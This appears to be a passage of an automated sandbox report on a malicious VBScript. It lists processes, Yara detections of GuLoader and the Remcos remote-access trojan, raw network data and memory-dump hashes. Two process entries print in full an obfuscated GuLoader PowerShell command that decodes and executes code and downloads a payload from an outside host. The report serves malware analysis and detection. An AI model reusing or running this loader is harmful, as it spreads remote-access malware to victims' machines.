                                          2024-12-12 06:54:52 UTC1369INData Raw: 95 85 b3 e5 ce aa 01 59 3d 18 6f 3d 39 7c bc d5 3e ae 3b 58 bd 9c 0e 2d aa 5c 86 69 c6 c3 e2 20 e1 fe 2f 46 f3 39 e2 47 27 32 96 6e eb c7 72 51 98 18 0c 7c 89 e8 41 2e be 64 9c b8 05 d0 80 51 38 f7 b9 ac 1c d1 60 50 36 c9 17 a6 22 a9 03 6b 0a e9 96 90 24 28 db 78 08 8f a2 8b d7 8c c9 0c 06 53 77 7d bc 39 5c e3 78 d7 e7 5c 72 c4 8d 82 48 2d 12 e7 14 37 27 93 1c da f6 51 8c b6 f1 25 ea 49 fe 39 3d be f7 cf 0d 83 d1 33 29 00 84 46 3a 12 84 09 88 33 19 51 7d 92 60 99 ab 18 1f 52 0b 9f 0b ce 44 3d 59 9f 2f b0 8c d4 7f 12 44 25 0b 5d ec 93 a7 59 0f f6 5f 6a ca d1 2e 85 2d 75 0c 40 44 34 2f 84 b9 51 14 25 b0 4f e5 ff c0 de d6 61 e9 e3 bd 3b 6e 3e 62 4e 17 13 4d 21 c6 61 9a fa ea 33 9d 3b 21 05 71 97 7b 65 d4 dd 68 d8 1b 47 c6 b0 59 c6 54 8d b7 c6 dc ba d1 2a e0
                                          Data Ascii: Y=o=9|>;X-\i /F9G'2nrQ|A.dQ8`P6"k$(xSw}9\x\rH-7'Q%I9=3)F:3Q}`RD=Y/D%]Y_j.-u@D4/Q%Oa;n>bNM!a3;!q{ehGYT*
                                          2024-12-12 06:54:52 UTC1369INData Raw: a5 dd c3 8d fd 27 d6 3b e1 a7 ec 77 90 6b a5 07 cf 69 9a 6e eb af 6b d0 dd 18 e4 b0 2d ee 41 77 78 dd 7c ec 42 d0 68 cf 35 f7 b9 c4 3f 50 25 50 de 7f 23 a5 22 f0 c0 d2 72 bc d1 be b8 c5 ae 0c 08 e7 8f ff e3 89 21 ac 22 50 77 24 0d 56 5c 5a 84 83 a0 5c 9a 4c be 82 48 45 25 66 51 37 cf 3b 28 d9 96 26 3d b8 90 e8 13 1c b9 e5 ac cf c4 cf 9d ee 90 b2 16 01 6c 36 78 14 84 50 4b 8a 01 07 3a 92 88 db a6 18 1f 7a 40 1e 0e e0 c8 06 19 fd 2f e9 4f 79 88 29 45 25 71 5a 55 a3 ff 1e 0f 1e 92 5f ca d1 46 d0 ac 30 0c a8 79 00 2c 84 e0 d2 7e 25 c9 31 c9 d4 b3 36 f3 52 e9 ea d5 64 ef 7b 12 a1 32 27 4c 21 9f a2 dd 1c bc 74 9d d3 5c 76 70 97 13 0c 55 98 68 70 14 73 05 9e 67 63 84 71 93 81 dc 62 b4 59 e1 88 7e 39 8f 93 18 f2 1e 4b e8 35 eb af 67 a6 b6 69 b1 d0 2f 77 77 4e f5
                                          Data Ascii: ';wkink-Awx|Bh5?P%P#"r!"Pw$V\Z\LHE%fQ7;(&=l6xPK:z@/Oy)E%qZU_F0y,~%16Rd{2'L!t\vpUhpsgcqbY~9K5gi/wwN
                                          Target ID:0
                                          Start time:01:54:05
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs"
                                          Imagebase:0x7ff7eb270000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:01:54:06
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev 
lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. 
hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. 
TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis .cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;"
                                          Imagebase:0x7ff741d30000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:01:54:06
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:01:54:16
                                          Start date:12/12/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev 
lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. 
hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. 
TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis .cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;"
                                          Imagebase:0x850000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.1610779678.0000000008EC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.1612779996.000000000971E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.1593326524.000000000616F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:01:54:16
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:13
                                          Start time:03:48:33
                                          Start date:12/12/2024
                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                          Imagebase:0x230000
                                          File size:59'904 bytes
                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                            • Instruction Fuzzy Hash: 6721B2A2D4F7C68FF3959768085A0792FE59F67650B0984BEE08ECB0D3D8199C0D8792
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b578e82c6b7147883b3fa518b75cba8900d5998953a141553406ace8f01874e
                                            • Instruction ID: 22d5cc6cc5f93bb466f5300cd16db630836e2f29891d3156ffe8a72f4ebf8aa6
                                            • Opcode Fuzzy Hash: 6b578e82c6b7147883b3fa518b75cba8900d5998953a141553406ace8f01874e
                                            • Instruction Fuzzy Hash: C2D14662A4EB8A8FF756976888555B47BE1EF96210B0840FEE04DCB193D91EDC0AC3D1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8899a568b13940fe7003ce3c634b94b3ec522a67447da2a61d3b0355c4248070
                                            • Instruction ID: d8de6d31dc083f6c7e6c93301dd387f0c32de58c74d4b13d905e8ee9370c4e56
                                            • Opcode Fuzzy Hash: 8899a568b13940fe7003ce3c634b94b3ec522a67447da2a61d3b0355c4248070
                                            • Instruction Fuzzy Hash: 92D1196294EB8A8FF795D72888556747BD1EF56210F1840BEE08DC71D3DE1EAC4A8382
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 40512a4e93118e1a5609f00db8b12854c233dfaea99cf6a33ef64287400fea6e
                                            • Instruction ID: 0da46025a68e64417ef073a00eebc8fbbe3c4b0e77b2738b1ebdca10bc5fec5e
                                            • Opcode Fuzzy Hash: 40512a4e93118e1a5609f00db8b12854c233dfaea99cf6a33ef64287400fea6e
                                            • Instruction Fuzzy Hash: 13A1276299EB8B8FF759976858165753BD5EF92210F4941BEE04EC30E3DE09E80983C1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1397601725.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac480000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a79337933cf3469d168ed3954a2b7693761dc30de50d73667795660ab483d7af
                                            • Instruction ID: 24e0ecacd0ad4fd1b0c566a500f18df54b2d375b38b73608c2462a7a3e8f54a0
                                            • Opcode Fuzzy Hash: a79337933cf3469d168ed3954a2b7693761dc30de50d73667795660ab483d7af
                                            • Instruction Fuzzy Hash: F9B1B37090CA4D8FEBA8DF28C8557F93BD1FF55310F04826EE85DC7292CA34A9458B86
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be4990cac3fa571e5e749fde2eff8fca83d2fc9b55bcc0cda67497bb28f7704a
                                            • Instruction ID: 469faf2fcf52d251df88964609f4d1439cb2e163d051fc2456b8988669e448a4
                                            • Opcode Fuzzy Hash: be4990cac3fa571e5e749fde2eff8fca83d2fc9b55bcc0cda67497bb28f7704a
                                            • Instruction Fuzzy Hash: 2491056198EB8A8FF79A972888555747FE9EF53210F0841FEE08DCB193D91ADC0983D1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f69fbbeac24f3680f8dc06da5770dafc69ab3185b451daf81392f930655f485
                                            • Instruction ID: ef791b3f1c8361f474b3cb2f6f9e3490794bb2d0bb46af72832ad8f8ffbc3207
                                            • Opcode Fuzzy Hash: 5f69fbbeac24f3680f8dc06da5770dafc69ab3185b451daf81392f930655f485
                                            • Instruction Fuzzy Hash: 0A613561A4E7CA8FEB529B6888555B57FE4EF57210B0941EFE04DCB0A3DA09D809C392
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03a9b62a9666de807de7d781a46d52ba6bdac2c062ec78f16ea7e6da6f3ad2a6
                                            • Instruction ID: 02fb80b574b3f4e2babd1096864bfafe04827ee97ca69434545d77232a39b1cf
                                            • Opcode Fuzzy Hash: 03a9b62a9666de807de7d781a46d52ba6bdac2c062ec78f16ea7e6da6f3ad2a6
                                            • Instruction Fuzzy Hash: DF41D25198FBCA4FE766D76848A45747FE1DF17210B0844EEE08DCB1E3D90E9C0A8392
                                            Memory Dump Source
